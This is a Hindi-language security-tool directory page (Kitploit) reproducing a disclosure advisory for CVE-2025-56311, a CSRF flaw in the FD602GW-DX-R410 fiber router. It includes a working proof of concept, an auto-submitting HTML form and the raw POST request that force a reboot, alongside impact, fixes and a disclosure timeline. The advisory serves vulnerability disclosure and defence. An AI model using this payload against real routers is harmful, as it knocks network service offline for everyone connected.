Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-56311 — FD602GW-DX-R410 राउटर में CSRF कमजोरी दूरस्थ हमलावरों को डिवाइस को रिबूट करने की अनुमति देती है, जब कोई व्यवस्थापक प्रमाणित होता है, तो /boaform/admin/formReboot पर एक तैयार POST अनुरोध के माध्यम से। | Kitploit
उपकरण/GitHubGitHub/wrathfuldiety/cve-2025-56311
भेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubwrathfuldiety/cve-2025-56311

CVE-2025-56311

FD602GW-DX-R410 राउटर में CSRF कमजोरी दूरस्थ हमलावरों को डिवाइस को रिबूट करने की अनुमति देती है, जब कोई व्यवस्थापक प्रमाणित होता है, तो /boaform/admin/formReboot पर एक तैयार POST अनुरोध के माध्यम से।

रिपॉजिटरी देखें
211 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-56311: सुरक्षा सलाह – FD602GW-DX-R410 राउटर रीबूट फ़ंक्शन में CSRF भेद्यता

FD602GW-DX-R410 फाइबर राउटर के एडमिन इंटरफ़ेस (फर्मवेयर V2.2.14) में क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट और सुरक्षा सलाह। यह सलाह प्रभाव, हमले के वेक्टर और उपचार के लिए सिफारिशों की रूपरेखा प्रस्तुत करती है।

fd602gw-dx-r410-csrf-advisory

FD602GW-DX-R410 राउटर में CSRF भेद्यता दूरस्थ हमलावरों को डिवाइस को रीबूट करने की अनुमति देती है, जब कोई एडमिन प्रमाणित होता है, तो /boaform/admin/formReboot पर एक क्राफ्टेड POST अनुरोध के माध्यम से।


अवलोकन

FD602GW-DX-R410 फाइबर राउटर के वेब-आधारित एडमिन कंसोल (फर्मवेयर V2.2.14) में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता पाई गई। /boaform/admin/formReboot एंडपॉइंट CSRF टोकन या ओरिजिन सत्यापन के बिना पूर्ण डिवाइस रीबूट को ट्रिगर करने के लिए POST अनुरोधों की अनुमति देता है। यदि कोई प्रमाणित व्यवस्थापक किसी दुर्भावनापूर्ण पृष्ठ पर जाता है, तो राउटर को बिना सहमति के दूरस्थ रूप से रीबूट किया जा सकता है।

  • CVE आईडी: CVE-2025-56311
  • सलाह प्रकाशन तिथि: जुलाई 2025
  • द्वारा खोजा गया: Hasanka Amarasinghe (स्वतंत्र सुरक्षा शोधकर्ता)
  • विक्रेता: Shenzhen C-Data Technology Co., Ltd.
  • प्रभावित उत्पाद: FD602GW-DX-R410 फाइबर राउटर
  • फर्मवेयर संस्करण: V2.2.14 (Build.1918.241111)
  • हार्डवेयर संस्करण: R410.1B
  • बूटलोडर संस्करण: V3.7-2312181457
  • वेब सर्वर: Boa/0.93.15
  • पहुंच वेक्टर: दूरस्थ (प्रमाणित व्यवस्थापक को लॉग इन होना चाहिए)
  • गंभीरता: मध्यम
  • CVSS v3.1 आधार स्कोर: 5.4 (मध्यम)

  • प्रभावित उत्पाद

    • डिवाइस: FD602GW-DX-R410 फाइबर राउटर
    • फर्मवेयर: V2.2.14 (Build.1918.241111)
    • घटक: रीबूट हैंडलर - /boaform/admin/formReboot
    • वेब सर्वर: Boa/0.93.15

    भेद्यता विवरण

    • प्रकार: क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)
    • हमले का वेक्टर: दूरस्थ (व्यवस्थापक को अपने सत्र में लॉग इन होना चाहिए)
    • प्रमाणीकरण: हमलावर के लिए कोई आवश्यकता नहीं (पीड़ित ब्राउज़र पर व्यवस्थापक सत्र आवश्यक)
    • प्रभाव: डिवाइस का अनधिकृत रीबूट
    • स्थिति स्थिरता: स्टेटलेस सत्र, संभवतः IP या आंतरिक सत्र टोकन के माध्यम से ट्रैक किया जाता है

    प्रूफ ऑफ कॉन्सेप्ट (PoC)

    CSRF पेलोड (HTML)

    root@kitploit:~
    <html>
      <!-- CSRF PoC - generated by Burp Suite Pro -->
      <body>
        <form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
          <input type="hidden" name="postSecurityFlag" value="+65535" />
          <input type="submit" value="Submit" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
    

    HTTP अनुरोध

    root@kitploit:~
    POST /boaform/admin/formReboot HTTP/1.1
    Host: 192.168.1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 23
    
    postSecurityFlag=+65535
    

    प्रतिक्रिया

    HTTP 200 OK; राउटर तुरंत रीबूट होता है।


    सिफारिशें

    • सभी एडमिन एंडपॉइंट पर CSRF टोकन और सख्त ओरिजिन/रेफरर सत्यापन लागू करें।
    • पुराने या अनाथ सत्रों को अमान्य करें और सत्रों को सुरक्षित कुकीज़ से बांधें।
    • रीबूट जैसी विनाशकारी कार्रवाइयों को निष्पादित करने से पहले CAPTCHA या पुष्टिकरण संकेतों पर विचार करें।
    • एडमिन इंटरफ़ेस एक्सेस को केवल विश्वसनीय IP या आंतरिक नेटवर्क तक सीमित करें।

    हमले का वेक्टर

    • राउटर व्यवस्थापक को प्रमाणित (लॉग इन) होना आवश्यक है।
    • एक हमलावर पीड़ित को एक दुर्भावनापूर्ण वेबपेज पर जाने के लिए लुभाता है जो चुपचाप रीबूट एंडपॉइंट पर POST अनुरोध ट्रिगर करता है।
    • राउटर जाली अनुरोध को स्वीकार करता है और तुरंत रीबूट होता है, जिससे सेवा से वंचित करना होता है।

    प्रभाव

    • जबरन रीबूट के कारण सेवा से वंचित होना।
    • सभी कनेक्टेड उपयोगकर्ताओं के लिए नेटवर्क उपलब्धता का नुकसान।
    • प्रभाव को बढ़ाने के लिए अन्य मुद्दों (जैसे, सत्र अपहरण या XSS) के साथ श्रृंखलाबद्ध करने की संभावना।

    प्रकटीकरण समयरेखा

    तिथिकार्रवाई
    जून 2025भेद्यता खोजी गई
    जून 2025जिम्मेदार प्रकटीकरण का प्रयास किया गया (कोई उत्तर नहीं)
    जुलाई 2025MITRE से CVE आईडी का अनुरोध किया गया
    जुलाई 2025सलाह तैयार की गई और प्रकाशन लंबित
    सितंबर 2025CVE आवंटित, सलाह सार्वजनिक की गई

    संदर्भ

    • विक्रेता: Shenzhen C-Data Technology Co., Ltd.
    • डिवाइस: FD602GW-DX-R410
    • फर्मवेयर: V2.2.14
    • GitHub सलाह: https://github.com/wrathfulDiety/CVE-2025-56311

    अस्वीकरण

    यह सलाह शैक्षिक और सुरक्षा जागरूकता उद्देश्यों के लिए प्रदान की गई है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। सभी परीक्षण एक नियंत्रित वातावरण में किए गए थे।

    टूल डाउनलोड करें